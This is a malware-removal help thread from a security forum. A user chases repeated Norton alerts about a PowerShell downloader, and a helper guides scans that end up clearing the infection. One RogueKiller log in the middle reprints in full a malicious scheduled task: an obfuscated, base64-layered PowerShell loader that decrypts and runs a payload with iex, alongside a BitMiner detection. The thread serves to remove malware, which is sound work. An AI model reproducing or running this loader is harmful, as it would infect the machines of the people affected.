Jump to content
tammathah

dl.downloader!gen11 tries to connect but is blocked by norton

Recommended Posts

hello,

 

Every 20 minutes i get a pop up  by norton telling me it has blocked dl.downloader!gen11 and has it deleted. I can't find any other information besides that it is linked to powershell.exe When i run norton, it doesnt find a thing, when i run antimalwarebytes, it doesnt find a thing. It looks like my system is clean and yet i can't get rid of the pop up.

 

Can anyone help me please?

20190412 malwarebytes rapport.txt Addition.txt FRST.txt

Share this post


Link to post
Share on other sites

Hello, Welcome to Malwarebytes.
I'm nasdaq and will be helping you.

If you can please print this topic it will make it easier for you to follow the instructions and complete all of the necessary steps in the order listed.
===

Please download the attached Fixlist.txt file to  the same folder where the Farbar tool is running from.
The location is listed in the 3rd line of the FRST.txt log you have submitted.

Run FRST and click Fix only once and wait.

The tool will create a log (Fixlog.txt) please post it to your reply.
===

Please post the Fixlog.txt and let me know what problem persists.

fixlist.txt

Share this post


Link to post
Share on other sites

it isnt fixed :( i just got the popup again saying auto protect had removed safety risk CL.Downloader!Gen11

Share this post


Link to post
Share on other sites

Hi,

Syncing

If you are Syncing Firefox it with other Devices reset it.
https://support.mozilla.org/en-US/kb/how-do-i-set-sync-my-computer

When all is well you can re-sync your devices.
<<<>>>

If this does not solve the issue, remove and re-install Firefox

Before proceeding save your Bookmarks. (Export)
https://support.mozilla.org/en-US/kb/export-firefox-bookmarks-to-backup-or-transfer

Firefox Password manager - Import your passwords.
Password Manager - Remember, delete, change and import saved passwords in Firefox
https://support.mozilla.org/en-US/kb/password-manager-remember-delete-change-and-import#w_protecting-your-passwords

If the problem persists in Firefox and you are Syncing with other Devices reset it.
https://support.mozilla.org/en-US/kb/how-do-i-set-sync-my-computer

When all is well you can re-sync your devices.

Clean the Firefox Cache.
https://kb.iu.edu/d/ahic#firefox

Remove Firefox using the instructions one this page.
https://support.mozilla.org/en-US/kb/uninstall-firefox-from-your-computer

Restart the computer normally.

Install the latest version of the application.
https://www.mozilla.org/en-US/firefox/new/

Import your Bookmarks. Same link as the Export function above.

Restart the computer normally.
<<<>>>

Let me know if all is well or not.

Share this post


Link to post
Share on other sites

no it didnt. I deleted Firefox and deleted the appdata. As soon as i rebooted the popup from Norton was there again. I haven't installed Firefox yet. 

Share this post


Link to post
Share on other sites

Hi,

Which browser were you using at the time?

Alson do you have other browsers installed.

Share this post


Link to post
Share on other sites

i have waterfox, edge and internet explorer. I wasn't using a browser at all when it popped up during startup. i can even play a game, have no browsers open and then it pops up as well. 

Share this post


Link to post
Share on other sites

Hi,

Please scan the computer with  the Farbar program one more time.

Make sure that the box to create a Addition.txt log is checked.

Task: {AB704F57-9CB0-45C6-A76F-252A5487B95D} - System32\Tasks\Microsoft\Windows\Maintenance\WinNAT => 1.vbs

Post the log if this entry is still listed.
===

Lets see what we can find in the Registry.

Run the Farbar program .exe as an Administrator.

In the Search text area, copy and paste the following:
1.vbs
Once done, click on the Search Registry button and wait for FRST to finish the search
On completion, a log will open in Notepad. Copy and paste its content in your next reply
====

Lets check your files.

Run the Farbar program .exe again as an Administrator.

In the Search text area, copy and paste the following:
1.vbs
Once done, click on the Search File search button and wait for FRST to finish the search
On completion, a log will open in Notepad. Copy and paste its content in your next reply
===

Share this post


Link to post
Share on other sites

the task isnt found in the addition log. 

===

log registry: 

Farbar Recovery Scan Tool (x64) Versie: 17.03.2019
Gestart door Gebruiker (14-04-2019 16:19:11)
Gestart vanaf C:\Users\Gebruiker\Desktop
Boot Modus: Normal

================== Zoeken in register: "1.vbs" ===========


====== Einde van Zoeken ======

===

file search button: 

 

Farbar Recovery Scan Tool (x64) Versie: 17.03.2019
Gestart door Gebruiker (14-04-2019 16:20:01)
Gestart vanaf C:\Users\Gebruiker\Desktop
Boot Modus: Normal

================== Bestanden Zoeken: "1.vbs" =============


====== Einde van Zoeken ======

Share this post


Link to post
Share on other sites

Hi

Please run this Sophos Virus Removal Tool

Please download Sophos Virus Removal Tool and save it to your computer's Desktop.

  • Right-click the icon and select Run as administrator.
  • Click Yes to accept any security warnings that may appear.
  • Click the Next button.
  • Select 'I accept the terms in the license agreement', then click Next twice.
  • Click the Install button and wait until the installation is complete.
  • Click the Finish button. The tool created a shortcut icon on the Desktop of your computer.
  • Now, double-click the Sophos Virus Removal Tool shortcut icon to run the tool.
  • Click Yes to accept any security warnings that may appear.
  • After it updates and a "Start Scanning" button appears in the lower right:
    • Disconnect from the Internet or physically unplug your Internet cable connection.
    • Close all open programs, scheduling/updating tasks and background processes that might activate during the scan including the screensaver.
    • Temporarily disable your anti-virus and real-time anti-spyware protection.



Windows Vista and above:
C:\ProgramData\Sophos\Sophos Virus Removal Tool\Logs\SophosVirusRemovalTool.log
 
Please post the contents of the log in your next reply and note any errors encountered.
===
 

Share this post


Link to post
Share on other sites

Hi,

Lets try these scans.

Norton Power Eraser
https://us.norton.com/support/tools/npe.html?lcid=1033
Download and run the program.
===

Continue with these scans if the problem persists.

Open Malwarebytes Anti-Malware.

On the Settings tab > Protection Scroll to and make sure the following are selected: Scroll to and make sure the following are selected:
Scan for Rootkits
Scan within Archives

Scroll further to Potential Threat Protection make sure the following are set as follows:

Potentially Unwanted Programs (PUP`s)        set as :- Always detect PUP`s (recommended)
Potentially Unwanted Modifications (PUM`s)  set as :- Always detect PUM`s (recommended)

Click on the Scan make sure Threat Scan is selected,

A Threat Scan will begin.

When the scan is complete if anything is found make sure that the first checkbox at the top is checked (that will automatically check all detected items), then click on the Quarantine Selected Tab

If asked to restart your computer to complete the removal, please do so

When complete click on Export Summary after deletion (bottom-left corner) and select Copy to Clipboard.

Wait for the prompt to restart the computer to appear, then click on Yes.

After the restart once you are back at your desktop, open MBAM once more to retrieve the log.

To get the log from Malwarebytes do the following:

Click on the Reports tab > from main interface.
Double click on the Scan log which shows the Date and time of the scan just performed.
Click Export > From export you have two options: > From export you have two options:
  Copy to Clipboard - if selected right click to your reply and select "Paste" log will be pasted to your reply
  Text file (*.txt)        - if selected you will have to name the file and save to a place of choice, recommend "Desktop" then attach to reply
 
Use "Copy to Clipboard, then Right click to your reply > select "Paste" that will copy the log to your reply.

===

--RogueKiller--

  • Download & SAVE to your Desktop Download RogueKiller
  • Quit all programs that you may have started.
  • Please disconnect any USB or external drives from the computer before you run this scan!
  • For Vista or above, right-click the program file and select "Run as Administrator"
  • Accept the user agreements.
  • Execute the scan and wait until it has finished.
  • If a Windows opens to explain what [PUM's] are, read about it.
  • Click the RoguKiller icon on your taksbar to return to the report.
  • Click open the Report
  • Click Export TXT button
  • Save the file as ReportRogue.txt
  • Click the Remove button to delete the items in RED  
  • Click Finish and close the program.
  • Locate the ReportRogue.txt file on your Desktop and copy/paste the contents in your next.


=======
 

Share this post


Link to post
Share on other sites

Malwarebytes
www.malwarebytes.com

-Logboekdetails-
Scandatum: 16-04-19
Scantijd: 00:35
Logbestand: bf786ecc-5fce-11e9-9d2d-9cb654f226f2.json

-Software-informatie-
Versie: 3.7.1.2839
Versie componenten: 1.0.563
Update pakketversie: 1.0.10180
Licentie: Proef

-Systeeminformatie-
Besturingssysteem: Windows 10 (Build 17763.437)
Processor: x64
Bestandssysteem: NTFS
Gebruiker: System

-Scansamenvatting-
Scantype: Bedreigingsscan
Scan geactiveerd door: Scheduler
Resultaat: Voltooid
Objecten gescand: 293092
Dreigingen herkend: 0
Dreigingen in quarantaine: 0
Verstreken tijd: 5 min, 38 sec

-Scanopties-
Geheugen: Ingeschakeld
Opstarten: Ingeschakeld
Bestandssysteem: Ingeschakeld
Archieven: Ingeschakeld
Rootkits: Uitgeschakeld
Heuristiek: Ingeschakeld
POP: Detectie
POA: Detectie

-Scandetails-
Proces: 0
(Geen kwaadaardige items gedetecteerd)

Module: 0
(Geen kwaadaardige items gedetecteerd)

Registersleutel: 0
(Geen kwaadaardige items gedetecteerd)

Registerwaarde: 0
(Geen kwaadaardige items gedetecteerd)

Registerdata: 0
(Geen kwaadaardige items gedetecteerd)

Gegevensstroom: 0
(Geen kwaadaardige items gedetecteerd)

Map: 0
(Geen kwaadaardige items gedetecteerd)

Bestand: 0
(Geen kwaadaardige items gedetecteerd)

Fysieke sector: 0
(Geen kwaadaardige items gedetecteerd)

WMI: 0
(Geen kwaadaardige items gedetecteerd)


(end)

 

====

RogueKiller Anti-Malware V13.1.9.0 (x64) [Mar 27 2019] (Free) by Adlice Software
mail : https://adlice.com/contact/
Website : https://adlice.com/download/roguekiller/
Operating System : Windows 10 (10.0.17763) 64 bits
Started in : Normal mode
User : Gebruiker [Administrator]
Started from : C:\Program Files\RogueKiller\RogueKiller64.exe
Signatures : 20190326_132530, Driver : Loaded
Mode : Standard Scan, Scan -- Date : 2019/04/16 00:46:11 (Duration : 00:08:58)
Switches : -refid 3

¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Processes ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤

¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Process Modules ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤

¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Services ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤

¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Tasks ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
[Suspicious.Path (Potentially Malicious)] \Microsoft\Windows\UNP\UNP -- powershell.exe [-c "$ddd = 'u322UqtjiCvsWr9X1FXLPaxerQGMTcoYnATvLsoo7HyWZJwG0BKES4l36HKcYqIRkGWtfK1Zl0KpMohwxVKlH5IZhGvtUqo9u0OgTItbtgyLSdB24RX8YNkz9Hn5bYhItm/6S94FiiCaH5AJtzbUMLM9yzLBTc1T31bNNa460yP+XKNG62bkGJNO3HOJP68ViiKNAZ1i/wnCKbEi6Q2aEp1B2AX7PbBU7Tq4DOFl+kmQEpdY6wHgEo0TnE3MFv54lmKwN4stpRCbErADmWn4Lsxy7VrcZ7xl4hKGGa8yjSrcApsA1VSaKcsY60HuEusHlRWdQdVfu3fvTbtmihCjWflpkROLSeEB7FvMAtUUjRO/PL5U8mCNZp1NvQ+fEpl1+E7SPcoTl3jQdOMYyFTBYo94lhfAWIYVnyrjH/V26BW7O4IVjAyRStZbpSPrZpwB4FjoaYEDiiKqF/oQxjeNBLoV7GSKafh2qneCBp8N2U3VLqJBjWboNZdQ/HG4VNdJsj7ZeNNS3keDRoJz9RW9OrAI/UCgD5YdoUD8cKtd8XHZU704pHPBFck3yQD9TboRhhSHHb85qG7lepR2nUPPQNwpnX/lfp1qrFTDMfh/rSaNFOB/k3alK4URnBi1PbYc/WCjOvYJjw6lU8YW8GHlFLcnnFenUeBpkQ6lMLQW4A7AK4URnBjCLt9CoTvdcMFK10nYX5VhpDebNqxMlHCyJrkG2gr4PcAz1hOHHcpLlWLgDvporwvxQ8ZE1h2XRqRprxH7KdsI+X79MspJ3GDkSuAO2V6YGJhP9inBbqko3XHNOK0ZghCZaqJdjXOiNp13wHDhCJsT5kvHK7sCjRGcFcAj7Rm2KK8TtSmXCpcevRHre9kV+32LBe5+sCyDB5R5616tEsYlmxWaMfhxi3O2N4xiy0eME4FZ2HWiVI1z3gSLZf174xjWSakynnXFVJoDmF67c+0J6mDIDv8NwA+eQacN8WDWVPxw2U3jb6071VTRcesd4BSVVJpNjBX8NM1c2GqKd5UO0COeCopi/me1PbYninr/V/EOm1amRYljkR6PWMAejXChEv157gLvSKgfix2ZCbFdxF7MYIsF7GffbYQCnXimQfsTmF6vFZwi+meVaOVgnFCEEZsBnEzVLqU9umLtBax613v0VddJuzbVNZkUw1KdSYFy5hL0fKlIoBWSANBJ0QrwYKtU7T2CBfVj+XXBFMVR3Rz6FI0dxiSNCOs6oGnofJ1qngSjWssxqEG0Pa9i+DKMZ/t791XaErst2XDFWMwC1VSaKf8N83r/SblI2UrKQNU/r0mwVPApyVvkbKUshEbVb/9FuEmTVIdNwBn6bMUj+UjIXtlDgkC+EYgq32eabuIGhXD+ZvUUmEi2d908nQHIR8ELzH+xX70ooy/+H9YpmgOZB+s02AnsYJwNo17leoAHnGPgAqctnQSNCMBU62aQYqc3i1jBPtI7gwGaWqhrwS6iIpR64XC4VMUJ9D7ZadELzB/VUtgl8RjzYO4avwfGRMlLgRn6ePgV5HGBCfl3qWfYQpck/RDrE5wCgR6PWK84xVzYaop3lQ7QLZAQlFq2KaVu4knNJaIlvF3aD7xamH+fBIBZwUvMdf9A+3boQbMzqB+LHZkJsUDuCOs6vA7uZelhiwGlMLQw3SbQXq8VnDLmYIB0ozeWKtlD1kSYT94x52bdfv4qny31N7lG2hLhK6Zkihm1StI1m2TtDfpX6hX6O48UkQebTMRX5B7pcYsU0DC3XIokmXnrU70znAKBHo9Yu2aWLqIo3XHNOK0ZghCZaqJdjXOiNp13wHDhCJsT5kvHK7sCjRGcFcAj7Rm0Ma0QpkrQQooa1V+7ZqUx83iWF8x/+We3A5xj/ADqFNVUjhGEA/ovwXWlRopmgiKZBZ8QwSP5ctMj/k+IZ/1t6UDaEKkyjz+/FZwijQOYaOIO+juiHdQdj0u2HJAIpA==';iex('$'+'d=''Wm5WdVkzUnBiMjRnWkdWaktGdGllWFJsVzExZEpHTmlMQ0JiYzNSeWFXNW5YU1J3WVhOektYc2tjR0lnUFNCYlUzbHpkR1Z0TGxSbGVIUXVSVzVqYjJScGJtZGRPanBWVkVZNExrZGxkRUo1ZEdWektDUndZWE56S1Rza2N5QTlJQ1J3WWxzd1hUc2thajB3TzJadmNpZ2thU0E5SURBN0lDUnBJQzFzZENBa1kySXVRMjkxYm5RN0lDUnBLeXNwZTJsbUtDUnFJQzFuWlNBa2NHSXVRMjkxYm5RcGV5UnFQVEI5SUNSeklEMGdLREl6SUMxaVlXNWtJQ1J6SUMxaWIzSWdNVFV5S1NBdFluaHZjaUFrY3pza1kySmJKR2xkSUQwZ0pHTmlXeVJwWFNBdFluaHZjaUFrY0dKYkpHcGRJQzFpZUc5eUlDUnpPeVJxS3l0OWNtVjBkWEp1SUNSallqdDlKRzlpYWlBOUlHZDNiV2tnZDJsdU16SmZaR2x6YTJSeWFYWmxJSHdnZDJobGNtVWdleVJmTGtSbGRtbGpaVWxFSUMxbGNTQW5YRnd1WEZCSVdWTkpRMEZNUkZKSlZrVXdKMzBnZkNCelpXeGxZM1FnVFc5a1pXd3NJRk5sY21saGJHNTFiV0psY2pza1pDQTlJR1JsWXlBb1cxTjVjM1JsYlM1RGIyNTJaWEowWFRvNlJuSnZiVUpoYzJVMk5GTjBjbWx1Wnlna1pHUmtLU2tnS0NSdlltb3VUVzlrWld3Z0t5QW5JQ2NnS3lBa2IySnFMbE5sY21saGJHNTFiV0psY2lrN2FXVjRJQ2hwWlhnb0oxdFRlWE4wWlcwdVZHVjRkQzVGYm1OdlpHbHVaMTA2T2xWVVJqZ3VSMlYwSnlzblUzUnlhVzVuS0NSa0tTY3BLUT09'';for($z=2;$z--;){$'+'d=[Syst'+'em.Te'+'xt.Enco'+'ding]::U'+'TF'+4*2+'.Get'+'Str'+'ing([Sys'+'tem.Conv'+'ert]::From'+'Base6'+'4String($d))}$'+'d|i'+'ex;')"] -> Found

¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Registry ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤

¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ WMI ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤

¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Hosts File ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
Hosts file is too big

¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Files ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
[PUP.Gen1 (Potentially Malicious)] (folder) Free Registry Cleaner -- C:\Users\Gebruiker\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Free Registry Cleaner -> Found
[Adw.Xunlei (Malicious)] (folder) Thunder Network -- C:\ProgramData\Thunder Network -> Found
[BitMiner.Gen0 (Malicious)] (folder) Windows -- C:\ProgramData\Windows -> Found

¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Web browsers ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
 

 

Share this post


Link to post
Share on other sites

Hi,

Please download the attached Fixlist.txt file to  the same folder where the Farbar tool is running from.
The location is listed in the 3rd line of the FRST.txt log you have submitted.

Run FRST and click Fix only once and wait.

The tool will create a log (Fixlog.txt) please post it to your reply.
===

Please run the RogueKiller program one more time and post the fresh log.

Please post the Fixlog.txt and let me know what problem persists.

fixlist.txt

Share this post


Link to post
Share on other sites

since last night, i haven't gotten a pop up yet so i think its fixed. 

Also Roguekiller only found something Norton related so i didnt touch that because i dont want my anti virus to be messed up. 

Fixlog.txt roguekiller2.txt

Share this post


Link to post
Share on other sites

Hi,

It may be a false positive.

Submit the file in bold to Virus Total

C:\Program Files\Norton Security\Engine\22.17.0.183\NortonSecurity.exe

https://www.virustotal.com/gui/home/upload
Follow the instructions on the page.

It may be a new version and RogueKiller is targeting an unknown file.

Share this post


Link to post
Share on other sites

this is the answer i got from Norton itself 

 

Submission Date              2019-04-17 19:51:34    

Tracking #           43173871           

Submitter           tamara kinders

Customer Notes              roguekiller sees it as a serious threat but i think its a false positive.       

 

 

tamara kinders,

We have processed your submission (Tracking #43173871) and your submission is now closed. The following is a report of our findings for the files in your submission:

 

 

Submission Summary

________________________________

 

 

Files Submitted

#             Filename             MD5      Determination Signature Protection Name         RR Seq#              

1             NortonSecurity.exe       229cb9487745972b70b539644ec99d67                Clean   N/A

                N/A      

 

 

Developer Notes:           

 

1. NortonSecurity.exe is a clean file.

               

 

 

________________________________

 

Assessment

________________________________

 

 

File 1:    NortonSecurity.exe      

MD5:     229cb9487745972b70b539644ec99d67               

SHA256:               04e0645f72842f9659e805b54aed6744d3425e8270af1d6bb188c434ffaebd94   

Determination: Clean   

Submission Detail:           This file is clean.            

________________________________

Share this post


Link to post
Share on other sites

i haven't gotten the pop up anymore so yes all is well. Thank you so much for everything youve done for me :D 

Share this post


Link to post
Share on other sites
Guest
This topic is now closed to further replies.

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.